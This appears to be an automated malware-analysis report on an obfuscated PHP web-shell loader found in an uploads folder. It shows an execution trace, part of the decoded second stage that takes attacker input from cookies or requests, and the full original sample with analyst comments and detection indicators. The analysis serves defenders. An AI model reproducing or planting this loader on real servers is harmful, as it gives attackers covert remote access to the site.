PHP Malware Analysis

2index.php

md5: 621fdac8939044afe82125e865ee4fd0


Screenshot


Attributes

Encoding


Deobfuscated PHP code

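Failed to deobfuscate code automatically. The beginning of the decoded payload is still visible as the second argument of the create_function call in the execution trace below.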

Execution traces

data/traces/621fdac8939044afe82125e865ee4fd0_trace-1676263136.2607.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:39:22.158501]
1	0	1	0.000156	393528
1	3	0	0.000211	395608	{main}	1		/var/www/html/uploads/2index.php	0	0
1		A						/var/www/html/uploads/2index.php	1	$VJcajj = '.AY.YSmU3V1XRRN'
1		A						/var/www/html/uploads/2index.php	1	$KueWZPVl = 'create_function'
1		A						/var/www/html/uploads/2index.php	1	$IENHTli = 'X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;9'
2	4	0	0.000283	396416	create_function	0		/var/www/html/uploads/2index.php	1	2	''	'if(!function_exists(\'xor_data__mut\')) {\n\tfunction xor_data__mut($data, $key)     {\n\t\t$out = \'\';\n\t\tfor($i = 0; $i<strlen($data); $i++)\n\t\t$out .= ($data[$i] ^ $key[$i % strlen($key)]);\n\t\treturn($out);\n\t}\n}\n\n$data = false;\n$data_key = false;\n\nforeach ($_COOKIE as $key => $value) {\n\t$data_key = $key;\n\t$data = $value;\n}\n\nif (!$data) {\n\tforeach ($_REQUEST as $key => $value) {\n\t\t$data_key = $key;\n\t\t$data = $value;\n\t}\n}\n\n$data = @unserialize(xor_data__mut(base64_decode('
3	5	0	0.000373	404328	{internal eval}	1		/var/www/html/uploads/2index.php	1	0
3	5	1	0.000388	404328
3	5	R			NULL
2	4	1	0.000404	402448
2	4	R			'\000lambda_3'
1		A						/var/www/html/uploads/2index.php	1	$wLZRBSe = '\000lambda_3'
2	6	0	0.000433	401616	__lambda_func	1		/var/www/html/uploads/2index.php	1	0
3	7	0	0.000445	401616	function_exists	0		/var/www/html/uploads/2index.php(1) : runtime-created function	1	1	'xor_data__mut'
3	7	1	0.000461	401656
3	7	R			FALSE
2		A						/var/www/html/uploads/2index.php(1) : runtime-created function	10	$data = FALSE
2		A						/var/www/html/uploads/2index.php(1) : runtime-created function	11	$data_key = FALSE
3	8	0	0.000501	401616	base64_decode	0		/var/www/html/uploads/2index.php(1) : runtime-created function	25	1	FALSE
3	8	1	0.000517	401680
3	8	R			''
3	9	0	0.000530	401648	xor_data__mut	1		/var/www/html/uploads/2index.php(1) : runtime-created function	25	2	''	FALSE
3		A						/var/www/html/uploads/2index.php(1) : runtime-created function	3	$out = ''
3		A						/var/www/html/uploads/2index.php(1) : runtime-created function	4	$i = 0
3	9	1	0.000569	401648
3	9	R			''
3	10	0	0.000581	401616	unserialize	0		/var/www/html/uploads/2index.php(1) : runtime-created function	25	1	''
3	10	1	0.000596	401664
3	10	R			FALSE
2		A						/var/www/html/uploads/2index.php(1) : runtime-created function	25	$data = FALSE
3	11	0	0.000621	401616	md5	0		/var/www/html/uploads/2index.php(1) : runtime-created function	30	1	'localhost'
3	11	1	0.000638	401712
3	11	R			'421aa90e079fa326b6494f812ad13e79'
3	12	0	0.000653	401680	md5	0		/var/www/html/uploads/2index.php(1) : runtime-created function	30	1	'421aa90e079fa326b6494f812ad13e79'
3	12	1	0.000667	401776
3	12	R			'757319b447175b6ca1882635b132a594'
2	6	1	0.000683	401616
1	3	1	0.000690	401616
			0.000719	320392
TRACE END   [2023-02-13 02:39:22.159095]


Generated HTML code

<html><head></head><body>757319b447175b6ca1882635b132a594</body></html>

Original PHP code

<?php
// Analyst notes. The statements below are the sample as captured; only comments were added.
//
// Shape: a two-stage loader. Stage one XORs string literals against each other to recover
// a function name and a PHP source string, compiles that source, and calls it.
// Static indicators visible here: a `string ^ string` result used as a callable, a call of
// the form <var>('', <literal> ^ <var>), and long literals that contain no readable PHP.

// XOR key for the function name recovered on the next statement.
$VJcajj='.AY.YSmU3V1XRRN';

// The execution trace records the result of this XOR as 'create_function'.
// create_function() compiles its second argument as PHP source (the trace shows an
// {internal eval} frame under it). It was deprecated in PHP 7.2 and removed in PHP 8.0,
// so this loader cannot run on PHP 8.0 or later.
$KueWZPVl='M3<O-623F8R,;= '^$VJcajj;

// XOR key for the stage-two source. The trace prints a shortened copy of this value.
$IENHTli='X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;94T0olENJpvaMWXJ1SVcaxnZDxzwUQ>8gu<Q=fpmNzqpuO tbPwSPfzWTrXKRDIhPkvYugCB,XycUUsBipF0H S0lQNY8H=Q18GJCDR64, +aius2S PPOxfVgiq-R4+.XQqoDTCP.a +H;X4UE2NnikH7 Idzevd,h V+XO47SN4UZpN1:x7=hcpjc jl,tykmegnkYhe';

// Stage two: the literal XORed with $IENHTli is PHP source, compiled with an empty
// parameter list. Per the trace, that source:
//   - defines xor_data__mut($data, $key), a repeating-key XOR over $data;
//   - sets $data_key / $data from the last entry of $_COOKIE, and from the last entry of
//     $_REQUEST when no cookie value was found;
//   - passes the value through base64_decode, xor_data__mut and @unserialize.
// The trace cuts the source off at "base64_decode(", so what is done with the unserialized
// result is not visible on this page. unserialize() on request-controlled data is an
// object-injection sink in its own right.
// NOTE(review): the second argument of xor_data__mut was FALSE in the trace, which matches
// $data_key being the XOR key; confirm against the full decoded source.
$wLZRBSe=$KueWZPVl('', '1FNF1-RTJTO+1X3-GDXEbXY0h+O53q04>LmJLv=9nM9TC-8OSg;5G4H Z9;.UFTFI0 O4dWNSV2BlLHVY-gaoEZ-:JGeRULn9OQ KYS=yTkCMNfTnCHR+4NLcDS0-PSZoYLyYkz1J:88XDnZGbSAN51rScKcBb,S8vU kKG4HH>5RIT, YH-zP0Og;YB33UrgOGIDzsNEo7mkRU8MOMuDWSPIYwzL,JOM11N2yXu72L>1Ibf<< -OR9IZBr65-vr,U8OLJV0HoEqaM5.>CPaE+IAI4-TQ0,X=uDte-ETj13F.S>.FjfJV YUEk7KagIXDYtUDLC5YPGgxHXH,5-HHET1h++2+97F+SNM=ROXYMWJ08 OEcz:ln0B6UD+6VHKOraB2U5IPfLW0VO-qXDID;X3WkEa:h6G:t>5Y-KeG0=ENX I-Z8 2y-.7s6PDP87TU K1,5Txe>V35R.7LOI;1QBMnIZQT;.8-ICfwe=Uak W:SXRgF2643A6>Y3q1CPG CGK.+3WZAi39>PzvEGXF7 MRS10JY<RW4DA-DnGLPR,FMVdFe2UN16Bmx3v+PiXBnBPutJoJZ4rZbOVfQ:R2I3:+ g-E8BL4bd43OXCAOFEUWV2T1yfXFvGIQVX=NX9=YK 571uFPJ1W7U1bogUcb-OI=LJLMnQbE5C7gYSffY1oXjni=ek-1+H+t><s<689G:GBpSo'^$IENHTli);

// Invokes the runtime-created function (the trace names it '\000lambda_3').
// In the sandbox run no cookie or request data was supplied: unserialize('') returned
// FALSE, md5() was applied twice starting from 'localhost', and the response body was the
// resulting 32-hex-character digest.
// NOTE(review): 'localhost' is presumably the request host name; confirm. If so, a bare
// md5(md5(host)) response body to a request for a PHP file in an upload directory is a
// usable network-side indicator for this family.
$wLZRBSe();